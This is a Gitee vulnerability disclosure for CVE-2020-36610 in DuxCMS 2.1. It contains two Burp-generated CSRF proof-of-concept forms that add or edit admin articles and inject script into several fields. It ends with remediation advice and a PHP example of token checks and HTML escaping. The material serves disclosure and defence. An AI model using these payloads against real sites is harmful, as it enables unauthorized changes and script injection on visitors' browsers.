CVE-2020-36610: Add article has CSRF and XSS · Issue #I183GG · 王爷/DuxCMS2.1支持php7.0以上版本 - Gitee.com
A vulnerability was found in annyshow DuxCMS 2.1. It has been declared as problematic. This vulnerability affects unknown code. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-215116.
Add/Edit article
Log in to the system and add an article like this.
The captured data packet has an XSS vulnerability in the content parameter.
Edit article test
Generate the CSRF payload using the Burp Suite plugin.
Copy that and edit it like this. This is an edit-article payload:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/DuxCMS/admin.php?r=article/AdminContent/edit" method="POST">
<input type="hidden" name="class_id" value="2" />
<input type="hidden" name="title" value="test333333" />
<input type="hidden" name="image" value="" />
<input type="hidden" name="content" value="sfdadsfadfasfdadsfadf&lt;script&gt;alert(456)&lt;/script&gt; " />
<input type="hidden" name="get_image" value="1" />
<input type="hidden" name="get_image_num" value="1" />
<input type="hidden" name="get_description" value="1" />
<input type="hidden" name="description" value="sfdadsfadfa" />
<input type="hidden" name="keywords" value="sfdadsfadfa" />
<input type="hidden" name="taglink" value="1" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="font_color" value="0" />
<input type="hidden" name="urltitle" value="test2" />
<input type="hidden" name="url" value="" />
<input type="hidden" name="time" value="2020&lt;script&gt;alert(456)&lt;/script&gt; " />
<input type="hidden" name="copyfrom" value="sds&lt;script&gt;alert(456)&lt;/script&gt; " />
<input type="hidden" name="views" value="6" />
<input type="hidden" name="sequence" value="0" />
<input type="hidden" name="tpl" value="" />
<input type="hidden" name="content_id" value="2" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
If you want to edit “test111111”,
run this payload like this and it will successfully edit this article's content.
Access this article and it will alert something like this.
Add article test: CSRF and XSS payload
This payload uses add article and inputs evil JavaScript in the “content” parameter.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/DuxCMS/admin.php?r=article/AdminContent/add" method="POST">
<input type="hidden" name="class_id" value="1" />
<input type="hidden" name="title" value="aaaaaaaaaaaaaaaaaaaaa" />
<input type="hidden" name="image" value="" />
<input type="hidden" name="content" value="sfdadsfadfasfdadsfadf&lt;script&gt;alert(456)&lt;/script&gt; " />
<input type="hidden" name="get_image" value="1" />
<input type="hidden" name="get_image_num" value="1" />
<input type="hidden" name="get_description" value="1" />
<input type="hidden" name="description" value="adfads" />
<input type="hidden" name="keywords" value="adfa" />
<input type="hidden" name="taglink" value="1" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="font_color" value="0" />
<input type="hidden" name="urltitle" value="" />
<input type="hidden" name="url" value="" />
<input type="hidden" name="time" value="2020/01/08 15:49" />
<input type="hidden" name="copyfrom" value="本站" />
<input type="hidden" name="views" value="0" />
<input type="hidden" name="sequence" value="0" />
<input type="hidden" name="tpl" value="" />
<input type="hidden" name="content_id" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Run this payload,
and you can see it adds one article “aaaaaaaaaaaaaaaaa”.
Access it and it will successfully run some evil JavaScript like this.
The CSRF and XSS vulnerabilities are caused because no token is set for these functions and sensitive characters are not filtered.
Solution
1) Set a token for this function.
2) Filter sensitive characters in any input data.
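The two fixes above, written out as an added PHP example. This is not DuxCMS code and does not use its actual API; the function names, the `_token` field name and the `$_SESSION`-style array are assumptions for illustration. The handler rejects any add/edit POST that does not carry the per-session token (which a cross-site form cannot read), and HTML-encodes the free-text fields the report shows being abused (content, time, copyfrom) so that `<script>` is stored and rendered as literal text.

```php
<?php
// Added example (not DuxCMS code): per-session CSRF token plus HTML
// encoding for article fields such as "content", "time" and "copyfrom".
// Function names and the session array layout are assumptions.

declare(strict_types=1);

const CSRF_FIELD = '_token'; // assumed hidden-field name carried in the form

// Issue (or reuse) a random per-session token to embed in the add/edit form.
function csrf_token(array &$session): string
{
    if (empty($session[CSRF_FIELD])) {
        $session[CSRF_FIELD] = bin2hex(random_bytes(32));
    }
    return $session[CSRF_FIELD];
}

// Validate the token submitted with a state-changing POST. hash_equals()
// compares in constant time, so a wrong guess does not leak how close it was.
function csrf_valid(array $session, array $post): bool
{
    $expected = $session[CSRF_FIELD] ?? '';
    $given    = $post[CSRF_FIELD] ?? '';
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

// Encode untrusted text for an HTML context so "<script>" renders as text.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Guard for the add/edit handlers: refuse forged posts before any write,
// then encode every free-text field that ends up in a page.
function handle_article_post(array $session, array $post): array
{
    if (!csrf_valid($session, $post)) {
        return ['status' => 403, 'body' => 'invalid or missing CSRF token'];
    }
    $fields = ['title', 'content', 'description', 'keywords', 'time', 'copyfrom'];
    $clean  = [];
    foreach ($fields as $f) {
        $clean[$f] = html_escape((string) ($post[$f] ?? ''));
    }
    return ['status' => 200, 'body' => $clean];
}

// Constructed demonstration input using the same field values as the report.
$session = [];
$token   = csrf_token($session);

// A forged cross-site form post carries no token and is rejected.
$forged = [
    'content' => 'sfdadsfadf<script>alert(456)</script>',
    'time'    => '2020<script>alert(456)</script>',
];
$rejected = handle_article_post($session, $forged);

// A submission from the CMS's own form carries the token and is accepted,
// with the script tags encoded as entities.
$legit    = $forged + [CSRF_FIELD => $token];
$accepted = handle_article_post($session, $legit);

var_dump($rejected['status'], $accepted['status'], $accepted['body']['content']);
```

The example encodes at storage time because that is what the report's second fix asks for; in a CMS the more robust placement is to store the raw text and encode at render time with the same `htmlspecialchars()` call, so the encoding matches the context the value is printed into. Setting the session cookie with `SameSite=Lax` or `Strict` is a cheap second layer against the cross-site POST, but it does not replace the token check.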